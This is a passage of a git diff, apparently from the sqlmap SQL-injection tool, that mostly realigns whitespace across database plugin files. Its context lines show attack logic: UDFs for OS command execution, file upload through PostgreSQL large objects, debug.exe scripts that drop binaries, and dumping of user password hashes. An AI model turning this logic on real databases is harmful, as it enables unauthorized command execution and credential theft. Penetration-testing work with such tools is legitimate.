b/plugins/dbms/oracle/filesystem.py @@ -16,11 +16,11 @@ class Filesystem(GenericFilesystem): GenericFilesystem.__init__(self) def readFile(self, rFile): - errMsg = "File system read access not yet implemented for " + errMsg = "File system read access not yet implemented for " errMsg += "Oracle" raise sqlmapUnsupportedFeatureException, errMsg def writeFile(self, wFile, dFile, fileType=None, confirm=True): - errMsg = "File system write access not yet implemented for " + errMsg = "File system write access not yet implemented for " errMsg += "Oracle" raise sqlmapUnsupportedFeatureException, errMsg diff --git a/plugins/dbms/oracle/fingerprint.py b/plugins/dbms/oracle/fingerprint.py index fcd9ea1a3..892b2f070 100644 --- a/plugins/dbms/oracle/fingerprint.py +++ b/plugins/dbms/oracle/fingerprint.py @@ -28,7 +28,7 @@ class Fingerprint(GenericFingerprint): GenericFingerprint.__init__(self, DBMS.ORACLE) def getFingerprint(self): - value = "" + value = "" wsOsFp = Format.getOs("web server", kb.headersFp) if wsOsFp: @@ -46,9 +46,9 @@ class Fingerprint(GenericFingerprint): value += DBMS.ORACLE return value - actVer = Format.getDbms() - blank = " " * 15 - value += "active fingerprint: %s" % actVer + actVer = Format.getDbms() + blank = " " * 15 + value += "active fingerprint: %s" % actVer if kb.bannerFp: banVer = kb.bannerFp["dbmsVersion"] if 'dbmsVersion' in kb.bannerFp else None diff --git a/plugins/dbms/oracle/takeover.py b/plugins/dbms/oracle/takeover.py index 64fcce9b5..3f7f1d885 100644 --- a/plugins/dbms/oracle/takeover.py +++ b/plugins/dbms/oracle/takeover.py @@ -16,21 +16,21 @@ class Takeover(GenericTakeover): GenericTakeover.__init__(self) def osCmd(self): - errMsg = "Operating system command execution functionality not " + errMsg = "Operating system command execution functionality not " errMsg += "yet implemented for Oracle" raise sqlmapUnsupportedFeatureException, errMsg def osShell(self): - errMsg = "Operating system shell functionality not yet " + errMsg = "Operating system shell functionality not yet " errMsg += "implemented for Oracle" raise sqlmapUnsupportedFeatureException, errMsg def osPwn(self): - errMsg = "Operating system out-of-band control functionality " + errMsg = "Operating system out-of-band control functionality " errMsg += "not yet implemented for Oracle" raise sqlmapUnsupportedFeatureException, errMsg def osSmb(self): - errMsg = "One click operating system out-of-band control " + errMsg = "One click operating system out-of-band control " errMsg += "functionality not yet implemented for Oracle" raise sqlmapUnsupportedFeatureException, errMsg diff --git a/plugins/dbms/postgresql/__init__.py b/plugins/dbms/postgresql/__init__.py index 2b7fa9fab..43d29f728 100644 --- a/plugins/dbms/postgresql/__init__.py +++ b/plugins/dbms/postgresql/__init__.py @@ -25,13 +25,13 @@ class PostgreSQLMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, def __init__(self): self.excludeDbsList = PGSQL_SYSTEM_DBS - self.sysUdfs = { - # UDF name: UDF parameters' input data-type and return data-type - "sys_exec": { "input": [ "text" ], "return": "int4" }, - "sys_eval": { "input": [ "text" ], "return": "text" }, - "sys_bineval": { "input": [ "text" ], "return": "int4" }, - "sys_fileread": { "input": [ "text" ], "return": "text" } - } + self.sysUdfs = { + # UDF name: UDF parameters' input data-type and return data-type + "sys_exec": { "input": [ "text" ], "return": "int4" }, + "sys_eval": { "input": [ "text" ], "return": "text" }, + "sys_bineval": { "input": [ "text" ], "return": "int4" }, + "sys_fileread": { "input": [ "text" ], "return": "text" } + } Syntax.__init__(self) Fingerprint.__init__(self) diff --git a/plugins/dbms/postgresql/filesystem.py b/plugins/dbms/postgresql/filesystem.py index f2644e58a..d8d29b26a 100644 --- a/plugins/dbms/postgresql/filesystem.py +++ b/plugins/dbms/postgresql/filesystem.py @@ -24,7 +24,7 @@ class Filesystem(GenericFilesystem): GenericFilesystem.__init__(self) def unionReadFile(self, rFile): - errMsg = "PostgreSQL does not support file reading with UNION " + errMsg = "PostgreSQL does not support file reading with UNION " errMsg += "query SQL injection technique" raise sqlmapUnsupportedFeatureException, errMsg @@ -37,7 +37,7 @@ class Filesystem(GenericFilesystem): return self.udfEvalCmd(cmd="'%s'" % rFile, udfName="sys_fileread") def unionWriteFile(self, wFile, dFile, fileType, confirm=True): - errMsg = "PostgreSQL does not support file upload with UNION " + errMsg = "PostgreSQL does not support file upload with UNION " errMsg += "query SQL injection technique" raise sqlmapUnsupportedFeatureException, errMsg @@ -45,13 +45,13 @@ class Filesystem(GenericFilesystem): wFileSize = os.path.getsize(wFile) if wFileSize > 8192: - errMsg = "on PostgreSQL it is not possible to write files " + errMsg = "on PostgreSQL it is not possible to write files " errMsg += "bigger than 8192 bytes at the moment" raise sqlmapUnsupportedFeatureException, errMsg self.oid = randomInt() - debugMsg = "creating a support table to write the base64 " + debugMsg = "creating a support table to write the base64 " debugMsg += "encoded file to" logger.debug(debugMsg) @@ -60,7 +60,7 @@ class Filesystem(GenericFilesystem): logger.debug("encoding file to its base64 string value") fcEncodedList = self.fileEncode(wFile, "base64", False) - debugMsg = "forging SQL statements to write the base64 " + debugMsg = "forging SQL statements to write the base64 " debugMsg += "encoded file to the support table" logger.debug(debugMsg) @@ -71,7 +71,7 @@ class Filesystem(GenericFilesystem): for sqlQuery in sqlQueries: inject.goStacked(sqlQuery) - debugMsg = "create a new OID for a large object, it implicitly " + debugMsg = "create a new OID for a large object, it implicitly " debugMsg += "adds an entry in the large objects system table" logger.debug(debugMsg) @@ -81,7 +81,7 @@ class Filesystem(GenericFilesystem): inject.goStacked("SELECT lo_unlink(%d)" % self.oid) inject.goStacked("SELECT lo_create(%d)" % self.oid) - debugMsg = "updating the system large objects table assigning to " + debugMsg = "updating the system large objects table assigning to " debugMsg += "the just created OID the binary (base64 decoded) UDF " debugMsg += "as data" logger.debug(debugMsg) @@ -110,7 +110,7 @@ class Filesystem(GenericFilesystem): else: inject.goStacked("UPDATE pg_largeobject SET data=(DECODE((SELECT %s FROM %s), 'base64')) WHERE loid=%d" % (self.tblField, self.fileTblName, self.oid)) - debugMsg = "exporting the OID %s file content to " % fileType + debugMsg = "exporting the OID %s file content to " % fileType debugMsg += "file '%s'" % dFile logger.debug(debugMsg) diff --git a/plugins/dbms/postgresql/fingerprint.py b/plugins/dbms/postgresql/fingerprint.py index 172fded22..280a44095 100644 --- a/plugins/dbms/postgresql/fingerprint.py +++ b/plugins/dbms/postgresql/fingerprint.py @@ -32,7 +32,7 @@ class Fingerprint(GenericFingerprint): GenericFingerprint.__init__(self, DBMS.PGSQL) def getFingerprint(self): - value = "" + value = "" wsOsFp = Format.getOs("web server", kb.headersFp) if wsOsFp: @@ -50,9 +50,9 @@ class Fingerprint(GenericFingerprint): value += DBMS.PGSQL return value - actVer = Format.getDbms() - blank = " " * 15 - value += "active fingerprint: %s" % actVer + actVer = Format.getDbms() + blank = " " * 15 + value += "active fingerprint: %s" % actVer if kb.bannerFp: banVer = kb.bannerFp["dbmsVersion"] if 'dbmsVersion' in kb.bannerFp else None @@ -183,7 +183,7 @@ class Fingerprint(GenericFingerprint): if conf.db not in PGSQL_SYSTEM_DBS and conf.db != "public": conf.db = "public" - warnMsg = "on %s it is only possible to enumerate " % DBMS.PGSQL + warnMsg = "on %s it is only possible to enumerate " % DBMS.PGSQL warnMsg += "on the current schema and on system databases, " warnMsg += "sqlmap is going to use 'public' schema as " warnMsg += "database name" diff --git a/plugins/dbms/sqlite/connector.py b/plugins/dbms/sqlite/connector.py index 6ca0b4a72..da4e5e8f7 100644 --- a/plugins/dbms/sqlite/connector.py +++ b/plugins/dbms/sqlite/connector.py @@ -55,7 +55,7 @@ class Connector(GenericConnector): try: import sqlite except ImportError, _: - errMsg = "sqlmap requires 'python-sqlite2' third-party library " + errMsg = "sqlmap requires 'python-sqlite2' third-party library " errMsg += "in order to directly connect to the database '%s'" % self.db raise sqlmapMissingDependence, errMsg diff --git a/plugins/dbms/sqlite/fingerprint.py b/plugins/dbms/sqlite/fingerprint.py index 3a11b96c3..f0564d49c 100644 --- a/plugins/dbms/sqlite/fingerprint.py +++ b/plugins/dbms/sqlite/fingerprint.py @@ -27,7 +27,7 @@ class Fingerprint(GenericFingerprint): GenericFingerprint.__init__(self, DBMS.SQLITE) def getFingerprint(self): - value = "" + value = "" wsOsFp = Format.getOs("web server", kb.headersFp) if wsOsFp: @@ -46,7 +46,7 @@ class Fingerprint(GenericFingerprint): return value actVer = Format.getDbms() - blank = " " * 15 + blank = " " * 15 value += "active fingerprint: %s" % actVer if kb.bannerFp: diff --git a/plugins/dbms/sqlite/takeover.py b/plugins/dbms/sqlite/takeover.py index d2b7e2a33..cc55e7159 100644 --- a/plugins/dbms/sqlite/takeover.py +++ b/plugins/dbms/sqlite/takeover.py @@ -24,11 +24,11 @@ class Takeover(GenericTakeover): raise sqlmapUnsupportedFeatureException, errMsg def osPwn(self): - errMsg = "on SQLite it is not possible to establish an " + errMsg = "on SQLite it is not possible to establish an " errMsg += "out-of-band connection" raise sqlmapUnsupportedFeatureException, errMsg def osSmb(self): - errMsg = "on SQLite it is not possible to establish an " + errMsg = "on SQLite it is not possible to establish an " errMsg += "out-of-band connection" raise sqlmapUnsupportedFeatureException, errMsg diff --git a/plugins/dbms/sybase/enumeration.py b/plugins/dbms/sybase/enumeration.py index e4ede88ac..3867a7581 100644 --- a/plugins/dbms/sybase/enumeration.py +++ b/plugins/dbms/sybase/enumeration.py @@ -60,7 +60,7 @@ class Enumeration(GenericEnumeration): self.forceDbmsEnum() if not conf.db: - warnMsg = "missing database parameter, sqlmap is going to " + warnMsg = "missing database parameter, sqlmap is going to " warnMsg += "use the current database to enumerate table " warnMsg += "'%s' columns" % conf.tbl logger.warn(warnMsg) diff --git a/plugins/dbms/sybase/fingerprint.py b/plugins/dbms/sybase/fingerprint.py index a3aa44179..8f7f3f691 100644 --- a/plugins/dbms/sybase/fingerprint.py +++ b/plugins/dbms/sybase/fingerprint.py @@ -28,7 +28,7 @@ class Fingerprint(GenericFingerprint): GenericFingerprint.__init__(self, DBMS.SYBASE) def getFingerprint(self): - value = "" + value = "" wsOsFp = Format.getOs("web server", kb.headersFp) if wsOsFp: @@ -47,7 +47,7 @@ class Fingerprint(GenericFingerprint): return value actVer = Format.getDbms() - blank = " " * 15 + blank = " " * 15 value += "active fingerprint: %s" % actVer if kb.bannerFp: diff --git a/plugins/dbms/sybase/takeover.py b/plugins/dbms/sybase/takeover.py index 1e2cbebbd..456d23cfd 100644 --- a/plugins/dbms/sybase/takeover.py +++ b/plugins/dbms/sybase/takeover.py @@ -24,11 +24,11 @@ class Takeover(GenericTakeover): raise sqlmapUnsupportedFeatureException, errMsg def osPwn(self): - errMsg = "on Sybase it is not possible to establish an " + errMsg = "on Sybase it is not possible to establish an " errMsg += "out-of-band connection" raise sqlmapUnsupportedFeatureException, errMsg def osSmb(self): - errMsg = "on Sybase it is not possible to establish an " + errMsg = "on Sybase it is not possible to establish an " errMsg += "out-of-band connection" raise sqlmapUnsupportedFeatureException, errMsg diff --git a/plugins/generic/connector.py b/plugins/generic/connector.py index 3bf34851d..b2dc0a553 100644 --- a/plugins/generic/connector.py +++ b/plugins/generic/connector.py @@ -60,21 +60,21 @@ class Connector: raise sqlmapFilePathException, errMsg def connect(self): - errMsg = "'connect' method must be defined " + errMsg = "'connect' method must be defined " errMsg += "into the specific DBMS plugin" raise sqlmapUndefinedMethod, errMsg def fetchall(self): - errMsg = "'fetchall' method must be defined " + errMsg = "'fetchall' method must be defined " errMsg += "into the specific DBMS plugin" raise sqlmapUndefinedMethod, errMsg def execute(self, query): - errMsg = "'execute' method must be defined " + errMsg = "'execute' method must be defined " errMsg += "into the specific DBMS plugin" raise sqlmapUndefinedMethod, errMsg def select(self, query): - errMsg = "'select' method must be defined " + errMsg = "'select' method must be defined " errMsg += "into the specific DBMS plugin" raise sqlmapUndefinedMethod, errMsg diff --git a/plugins/generic/enumeration.py b/plugins/generic/enumeration.py index cb8c24e73..b59a43c0f 100644 --- a/plugins/generic/enumeration.py +++ b/plugins/generic/enumeration.py @@ -75,20 +75,20 @@ class Enumeration: def __init__(self): kb.data.has_information_schema = False - kb.data.banner = None - kb.data.currentUser = "" - kb.data.currentDb = "" - kb.data.cachedUsers = [] - kb.data.cachedUsersPasswords = {} - kb.data.cachedUsersPrivileges = {} - kb.data.cachedUsersRoles = {} - kb.data.cachedDbs = [] - kb.data.cachedTables = {} - kb.data.cachedColumns = {} - kb.data.cachedCounts = {} - kb.data.dumpedTable = {} - kb.data.processChar = None - self.alwaysRetrieveSqlOutput = False + kb.data.banner = None + kb.data.currentUser = "" + kb.data.currentDb = "" + kb.data.cachedUsers = [] + kb.data.cachedUsersPasswords = {} + kb.data.cachedUsersPrivileges = {} + kb.data.cachedUsersRoles = {} + kb.data.cachedDbs = [] + kb.data.cachedTables = {} + kb.data.cachedColumns = {} + kb.data.cachedCounts = {} + kb.data.dumpedTable = {} + kb.data.processChar = None + self.alwaysRetrieveSqlOutput = False def getBanner(self): if not conf.getBanner: @@ -164,7 +164,7 @@ class Enumeration: rootQuery = queries[Backend.getIdentifiedDbms()].users - condition = ( Backend.getIdentifiedDbms() == DBMS.MSSQL and Backend.isVersionWithin(("2005", "2008")) ) + condition = ( Backend.getIdentifiedDbms() == DBMS.MSSQL and Backend.isVersionWithin(("2005", "2008")) ) condition |= ( Backend.getIdentifiedDbms() == DBMS.MYSQL and not kb.data.has_information_schema ) if isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION) or isTechniqueAvailable(PAYLOAD.TECHNIQUE.ERROR) or conf.direct: @@ -319,7 +319,7 @@ class Enumeration: if not user or user in retrievedUsers: continue - infoMsg = "fetching number of password hashes " + infoMsg = "fetching number of password hashes " infoMsg += "for user '%s'" % user logger.info(infoMsg) @@ -330,7 +330,7 @@ class Enumeration: count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=2) if not isNumPosStrValue(count): - warnMsg = "unable to retrieve the number of password " + warnMsg = "unable to retrieve the number of password " warnMsg += "hashes for user '%s'" % user logger.warn(warnMsg) continue @@ -338,7 +338,7 @@ class Enumeration: infoMsg = "fetching password hashes for user '%s'" % user logger.info(infoMsg) - passwords = [] + passwords = [] if Backend.getIdentifiedDbms() == DBMS.ORACLE: plusOne = True @@ -361,14 +361,14 @@ class Enumeration: if passwords: kb.data.cachedUsersPasswords[user] = passwords else: - warnMsg = "unable to retrieve the password " + warnMsg = "unable to retrieve the password " warnMsg += "hashes for user '%s'" % user logger.warn(warnMsg) retrievedUsers.add(user) if not kb.data.cachedUsersPasswords: - errMsg = "unable to retrieve the password " + errMsg = "unable to retrieve the password " errMsg += "hashes for the database users" raise sqlmapNoneDataException, errMsg @@ -387,7 +387,7 @@ class Enumeration: def __isAdminFromPrivileges(self, privileges): # In PostgreSQL the usesuper privilege means that the # user is DBA - dbaCondition = ( Backend.getIdentifiedDbms() == DBMS.PGSQL and "super" in privileges ) + dbaCondition = ( Backend.getIdentifiedDbms() == DBMS.PGSQL and "super" in privileges ) # In Oracle the DBA privilege means that the # user is DBA @@ -424,13 +424,13 @@ class Enumeration: if isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION) or isTechniqueAvailable(PAYLOAD.TECHNIQUE.ERROR) or conf.direct: if Backend.getIdentifiedDbms() == DBMS.MYSQL and not kb.data.has_information_schema: - query = rootQuery.inband.query2 + query = rootQuery.inband.query2 condition = rootQuery.inband.condition2 elif Backend.getIdentifiedDbms() == DBMS.ORACLE and query2: - query = rootQuery.inband.query2 + query = rootQuery.inband.query2 condition = rootQuery.inband.condition2 else: - query = rootQuery.inband.query + query = rootQuery.inband.query condition = rootQuery.inband.condition if conf.user: @@ -454,7 +454,7 @@ class Enumeration: if values: for value in values: - user = None + user = None privileges = set() for count in xrange(0, len(value)): @@ -528,7 +528,7 @@ class Enumeration: if not user or user in retrievedUsers: continue - infoMsg = "fetching number of privileges " + infoMsg = "fetching number of privileges " infoMsg += "for user '%s'" % user logger.info(infoMsg) @@ -554,7 +554,7 @@ class Enumeration: return self.getPrivileges(query2=True) - warnMsg = "unable to retrieve the number of " + warnMsg = "unable to retrieve the number of " warnMsg += "privileges for user '%s'" % user logger.warn(warnMsg) continue @@ -634,21 +634,21 @@ class Enumeration: if privileges: kb.data.cachedUsersPrivileges[user] = list(privileges) else: - warnMsg = "unable to retrieve the privileges " + warnMsg = "unable to retrieve the privileges " warnMsg += "for user '%s'" % user logger.warn(warnMsg) retrievedUsers.add(user) if not kb.data.cachedUsersPrivileges: - errMsg = "unable to retrieve the privileges " + errMsg = "unable to retrieve the privileges " errMsg += "for the database users" raise sqlmapNoneDataException, errMsg return ( kb.data.cachedUsersPrivileges, areAdmins ) def getRoles(self, query2=False): - warnMsg = "on %s the concept of roles does not " % Backend.getIdentifiedDbms() + warnMsg = "on %s the concept of roles does not " % Backend.getIdentifiedDbms() warnMsg += "exist. sqlmap will enumerate privileges instead" logger.warn(warnMsg) @@ -656,13 +656,13 @@ class Enumeration: def getDbs(self): if Backend.getIdentifiedDbms() == DBMS.MYSQL and not kb.data.has_information_schema: - warnMsg = "information_schema not available, " + warnMsg = "information_schema not available, " warnMsg += "back-end DBMS is MySQL < 5. database " warnMsg += "names will be fetched from 'mysql' database" logger.warn(warnMsg) if Backend.getIdentifiedDbms() == DBMS.ORACLE: - warnMsg = "schema names are going to be used on Oracle " + warnMsg = "schema names are going to be used on Oracle " warnMsg += "for enumeration as the counterpart to database " warnMsg += "names on other DBMSes" logger.warn(warnMsg) @@ -735,7 +735,7 @@ class Enumeration: if bruteForce is None: if Backend.getIdentifiedDbms() == DBMS.MYSQL and not kb.data.has_information_schema: - errMsg = "information_schema not available, " + errMsg = "information_schema not available, " errMsg += "back-end DBMS is MySQL < 5.0" logger.error(errMsg) bruteForce = True @@ -747,7 +747,7 @@ class Enumeration: tables = None if not tables: - errMsg = "cannot retrieve table names, " + errMsg = "cannot retrieve table names, " errMsg += "back-end DBMS is Access" logger.error(errMsg) bruteForce = True @@ -854,7 +854,7 @@ class Enumeration: continue - infoMsg = "fetching number of tables for " + infoMsg = "fetching number of tables for " infoMsg += "database '%s'" % db logger.info(infoMsg) @@ -865,7 +865,7 @@ class Enumeration: count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=2) if not isNumPosStrValue(count): - warnMsg = "unable to retrieve the number of " + warnMsg = "unable to retrieve the number of " warnMsg += "tables for database '%s'" % db logger.warn(warnMsg) continue @@ -896,7 +896,7 @@ class Enumeration: if tables: kb.data.cachedTables[db] = tables else: - warnMsg = "unable to retrieve the tables " + warnMsg = "unable to retrieve the tables " warnMsg += "for database '%s'" % db logger.warn(warnMsg) @@ -940,13 +940,13 @@ class Enumeration: return self.getSchema() if Backend.getIdentifiedDbms() == DBMS.MYSQL and not kb.data.has_information_schema: - errMsg = "information_schema not available, " + errMsg = "information_schema not available, " errMsg += "back-end DBMS is MySQL < 5.0" logger.error(errMsg) bruteForce = True elif Backend.getIdentifiedDbms() == DBMS.ACCESS: - errMsg = "cannot retrieve column names, " + errMsg = "cannot retrieve column names, " errMsg += "back-end DBMS is Access" logger.error(errMsg) bruteForce = True @@ -1043,7 +1043,7 @@ class Enumeration: kb.data.cachedColumns[conf.db] = table if not kb.data.cachedColumns and not conf.direct: - infoMsg = "fetching number of columns " + infoMsg = "fetching number of columns " infoMsg += "for table '%s'" % conf.tbl infoMsg += " on database '%s'" % conf.db logger.info(infoMsg) @@ -1074,12 +1074,12 @@ class Enumeration: count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=2) if not isNumPosStrValue(count): - errMsg = "unable to retrieve the number of columns " + errMsg = "unable to retrieve the number of columns " errMsg += "for table '%s' " % conf.tbl errMsg += "on database '%s'" % conf.db raise sqlmapNoneDataException, errMsg - table = {} + table = {} columns = {} indexRange = getRange(count) @@ -1355,7 +1355,7 @@ class Enumeration: self.forceDbmsEnum() if not conf.db: - warnMsg = "missing database parameter, sqlmap is going to " + warnMsg = "missing database parameter, sqlmap is going to " warnMsg += "use the current database to dump table " warnMsg += "'%s' entries" % conf.tbl logger.warn(warnMsg) @@ -1383,7 +1383,7 @@ class Enumeration: elif kb.data.cachedColumns and conf.db in kb.data.cachedColumns and conf.tbl in kb.data.cachedColumns[conf.db]: colList = kb.data.cachedColumns[conf.db][conf.tbl].keys() else: - errMsg = "missing column names, " + errMsg = "missing column names, " errMsg += "can't dump table" raise sqlmapNoneDataException, errMsg @@ -1447,7 +1447,7 @@ class Enumeration: entries = [ entries ] entriesCount = len(entries) - index = 0 + index = 0 for column in colList: colLen = len(column) @@ -1591,7 +1591,7 @@ class Enumeration: def dumpAll(self): if Backend.getIdentifiedDbms() == DBMS.MYSQL and not kb.data.has_information_schema: - errMsg = "information_schema not available, " + errMsg = "information_schema not available, " errMsg += "back-end DBMS is MySQL < 5.0" raise sqlmapUnsupportedFeatureException, errMsg @@ -1603,9 +1603,9 @@ class Enumeration: infoMsg += "dump all entries of this database's tables only. " logger.info(infoMsg) - conf.tbl = None - conf.col = None - kb.data.cachedDbs = [] + conf.tbl = None + conf.col = None + kb.data.cachedDbs = [] kb.data.cachedTables = self.getTables() if kb.data.cachedTables: @@ -1763,7 +1763,7 @@ class Enumeration: count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=2) if not isNumPosStrValue(count): - warnMsg = "no database" + warnMsg = "no database" if dbConsider == "1": warnMsg += "s like" warnMsg += " '%s' found" % unsafeSQLIdentificatorNaming(db) @@ -1792,12 +1792,12 @@ class Enumeration: bruteForce = False if Backend.getIdentifiedDbms() == DBMS.MYSQL and not kb.data.has_information_schema: - errMsg = "information_schema not available, " + errMsg = "information_schema not available, " errMsg += "back-end DBMS is MySQL < 5.0" bruteForce = True elif Backend.getIdentifiedDbms() == DBMS.ACCESS: - errMsg = "cannot retrieve table names, " + errMsg = "cannot retrieve table names, " errMsg += "back-end DBMS is Access" logger.error(errMsg) bruteForce = True @@ -1878,7 +1878,7 @@ class Enumeration: count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=2) if not isNumPosStrValue(count): - warnMsg = "no databases have table" + warnMsg = "no databases have table" if tblConsider == "1": warnMsg += "s like" warnMsg += " '%s'" % unsafeSQLIdentificatorNaming(tbl) @@ -1947,12 +1947,12 @@ class Enumeration: bruteForce = False if Backend.getIdentifiedDbms() == DBMS.MYSQL and not kb.data.has_information_schema: - errMsg = "information_schema not available, " + errMsg = "information_schema not available, " errMsg += "back-end DBMS is MySQL < 5.0" bruteForce = True elif Backend.getIdentifiedDbms() == DBMS.ACCESS: - errMsg = "cannot retrieve column names, " + errMsg = "cannot retrieve column names, " errMsg += "back-end DBMS is Access" logger.error(errMsg) bruteForce = True @@ -2059,7 +2059,7 @@ class Enumeration: count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=2) if not isNumPosStrValue(count): - warnMsg = "no databases have tables containing column" + warnMsg = "no databases have tables containing column" if colConsider == "1": warnMsg += "s like" warnMsg += " '%s'" % column @@ -2186,7 +2186,7 @@ class Enumeration: return output else: if not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED) and not conf.direct: - warnMsg = "execution of custom SQL queries is only " + warnMsg = "execution of custom SQL queries is only " warnMsg += "available when stacked queries are supported" logger.warn(warnMsg) return None @@ -2207,7 +2207,7 @@ class Enumeration: return output def sqlShell(self): - infoMsg = "calling %s shell. To quit type " % Backend.getIdentifiedDbms() + infoMsg = "calling %s shell. To quit type " % Backend.getIdentifiedDbms() infoMsg += "'x' or 'q' and press ENTER" logger.info(infoMsg) diff --git a/plugins/generic/filesystem.py b/plugins/generic/filesystem.py index 0165ea3ca..198b6afa3 100644 --- a/plugins/generic/filesystem.py +++ b/plugins/generic/filesystem.py @@ -32,7 +32,7 @@ class Filesystem: def __init__(self): self.fileTblName = "sqlmapfile" - self.tblField = "data" + self.tblField = "data" def __unbase64String(self, base64Str): unbase64Str = "%s\n" % base64Str.decode("base64") @@ -41,7 +41,7 @@ class Filesystem: def __unhexString(self, hexStr): if len(hexStr) % 2 != 0: - errMsg = "for some reason(s) sqlmap retrieved an odd-length " + errMsg = "for some reason(s) sqlmap retrieved an odd-length " errMsg += "hexadecimal string which it is not able to convert " errMsg += "to raw string" logger.error(errMsg) @@ -63,9 +63,9 @@ class Filesystem: """ fileLines = [] - fileSize = len(binaryData) - lineAddr = 0x100 - lineLen = 20 + fileSize = len(binaryData) + lineAddr = 0x100 + lineLen = 20 fileLines.append("n %s" % chunkName) fileLines.append("rcx") @@ -79,7 +79,7 @@ class Filesystem: strLineChar = binascii.hexlify(lineChar) if not scrString: - scrString = "e %x %s" % (lineAddr, strLineChar) + scrString = "e %x %s" % (lineAddr, strLineChar) else: scrString += " %s" % strLineChar @@ -113,7 +113,7 @@ class Filesystem: dFileSize = inject.getValue(lengthQuery, resumeValue=False, charsetType=2) if dFileSize and dFileSize.isdigit(): - infoMsg = "the file has been successfully written and " + infoMsg = "the file has been successfully written and " infoMsg += "its size is %s bytes" % dFileSize dFileSize = long(dFileSize) @@ -126,7 +126,7 @@ class Filesystem: logger.info(infoMsg) else: - warnMsg = "it looks like the file has not been written, this " + warnMsg = "it looks like the file has not been written, this " warnMsg += "can occur if the DBMS process' user has no write " warnMsg += "privileges in the destination path" logger.warn(warnMsg) @@ -137,7 +137,7 @@ class Filesystem: back-end DBMS underlying file system """ - counter = 0 + counter = 0 sqlQueries = [] for fcEncodedLine in fcEncodedList: @@ -194,23 +194,23 @@ class Filesystem: back-end DBMS underlying file system """ - randScr = "tmpf%s.scr" % randomStr(lowercase=True) - chunkName = randomStr(lowercase=True) - fileScrLines = self.__binDataToScr(binaryData, chunkName) + randScr = "tmpf%s.scr" % randomStr(lowercase=True) + chunkName = randomStr(lowercase=True) + fileScrLines = self.__binDataToScr(binaryData, chunkName) forgedScrLines = [] - cmd = "" - charCounter = 0 - maxLen = 512 + cmd = "" + charCounter = 0 + maxLen = 512 logger.debug("generating binary file %s\%s, please wait.." % (tmpPath, chunkName)) for scrLine in fileScrLines: - forgedScrLine = "echo %s " % scrLine + forgedScrLine = "echo %s " % scrLine forgedScrLine += ">> \"%s\%s\"" % (tmpPath, randScr) forgedScrLines.append(forgedScrLine) for forgedScrLine in forgedScrLines: - cmd += "%s & " % forgedScrLine + cmd += "%s & " % forgedScrLine charCounter += len(forgedScrLine) if charCounter >= maxLen: @@ -230,31 +230,31 @@ class Filesystem: return chunkName def askCheckWrittenFile(self, wFile, dFile, fileType): - message = "do you want confirmation that the file '%s' " % dFile + message = "do you want confirmation that the file '%s' " % dFile message += "has been successfully written on the back-end DBMS " message += "file system? [Y/n] " - output = readInput(message, default="Y") + output = readInput(message, default="Y") if not output or output in ("y", "Y"): self.__checkWrittenFile(wFile, dFile, fileType) def unionReadFile(self, rFile): - errMsg = "'unionReadFile' method must be defined " + errMsg = "'unionReadFile' method must be defined " errMsg += "into the specific DBMS plugin" raise sqlmapUndefinedMethod, errMsg def stackedReadFile(self, rFile): - errMsg = "'stackedReadFile' method must be defined " + errMsg = "'stackedReadFile' method must be defined " errMsg += "into the specific DBMS plugin" raise sqlmapUndefinedMethod, errMsg def unionWriteFile(self, wFile, dFile, fileType, confirm=True): - errMsg = "'unionWriteFile' method must be defined " + errMsg = "'unionWriteFile' method must be defined " errMsg += "into the specific DBMS plugin" raise sqlmapUndefinedMethod, errMsg def stackedWriteFile(self, wFile, dFile, fileType, confirm=True): - errMsg = "'stackedWriteFile' method must be defined " + errMsg = "'stackedWriteFile' method must be defined " errMsg += "into the specific DBMS plugin" raise sqlmapUndefinedMethod, errMsg @@ -265,7 +265,7 @@ class Filesystem: if conf.direct or isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED): if isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED): - debugMsg = "going to read the file with stacked query SQL " + debugMsg = "going to read the file with stacked query SQL " debugMsg += "injection technique" logger.debug(debugMsg) @@ -312,7 +312,7 @@ class Filesystem: if conf.direct or isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED): if isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED): - debugMsg = "going to upload the %s file with " % fileType + debugMsg = "going to upload the %s file with " % fileType debugMsg += "stacked query SQL injection technique" logger.debug(debugMsg) diff --git a/plugins/generic/fingerprint.py b/plugins/generic/fingerprint.py index b8411a0fc..d2910f99c 100644 --- a/plugins/generic/fingerprint.py +++ b/plugins/generic/fingerprint.py @@ -23,17 +23,17 @@ class Fingerprint: Backend.forceDbms(dbms) def getFingerprint(self): - errMsg = "'getFingerprint' method must be defined " + errMsg = "'getFingerprint' method must be defined " errMsg += "into the specific DBMS plugin" raise sqlmapUndefinedMethod, errMsg def checkDbms(self): - errMsg = "'checkDbms' method must be defined " + errMsg = "'checkDbms' method must be defined " errMsg += "into the specific DBMS plugin" raise sqlmapUndefinedMethod, errMsg def checkDbmsOs(self, detailed=False): - errMsg = "'checkDbmsOs' method must be defined " + errMsg = "'checkDbmsOs' method must be defined " errMsg += "into the specific DBMS plugin" raise sqlmapUndefinedMethod, errMsg diff --git a/plugins/generic/misc.py b/plugins/generic/misc.py index 25a1da5b3..30c596f34 100644 --- a/plugins/generic/misc.py +++ b/plugins/generic/misc.py @@ -130,13 +130,13 @@ class Miscellaneous: for udf, inpRet in udfDict.items(): message = "do you want to remove UDF '%s'? [Y/n] " % udf - output = readInput(message, default="Y") + output = readInput(message, default="Y") if not output or output in ("y", "Y"): dropStr = "DROP FUNCTION %s" % udf if Backend.getIdentifiedDbms() == DBMS.PGSQL: - inp = ", ".join(i for i in inpRet["input"]) + inp = ", ".join(i for i in inpRet["input"]) dropStr += "(%s)" % inp logger.debug("removing UDF '%s'" % udf) diff --git a/plugins/generic/syntax.py b/plugins/generic/syntax.py index 37f7a6d88..52b5a1640 100644 --- a/plugins/generic/syntax.py +++ b/plugins/generic/syntax.py @@ -19,12 